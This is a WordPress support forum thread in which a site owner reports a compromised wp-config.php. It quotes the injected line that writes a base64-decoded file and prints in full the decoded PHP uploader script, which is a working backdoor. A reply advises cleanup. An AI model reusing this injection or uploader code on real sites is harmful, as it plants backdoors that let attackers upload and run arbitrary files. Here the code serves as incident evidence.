Upload PHP Script through wp-config.php
-
Hi There,
I want to report, that someone has uploaded php uploader script through wp-config.php
the wp-config.php become like this
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); file_put_contents("wp-upload-class.php", base64_decode('code removed by moderator')); /*'); /** MySQL database username */ define('DB_USER', 'user'); /** MySQL database password */ define('DB_PASSWORD', 'password'); /** MySQL hostname */ define('DB_HOST', 'localhost:'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', '');also they successfully create wp-upload-class.php
with uploader script which encoded as Base64<?php echo "This shit works!"; if (isset($_FILES["filename"])) { if($_FILES["filename"]["size"] > 1024*3*1024) { echo ("File too large (more than 3Mb)"); exit; } if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); echo ("<br>Done!<br>"); } else { echo("<br>Error! ".$php_errormsg."<br>"); } } ?>Please Fix It, i don’t know if anybody have been attacked with same method or not.
-
There’s nothing for us to fix. Your site was hacked; somehow someone got to your wp-config.php file. There are a number of ways for that to happen.
Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.
If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.
Note: moved from alpha/beta to fixing wordpress.
- The topic ‘Upload PHP Script through wp-config.php’ is closed to new replies.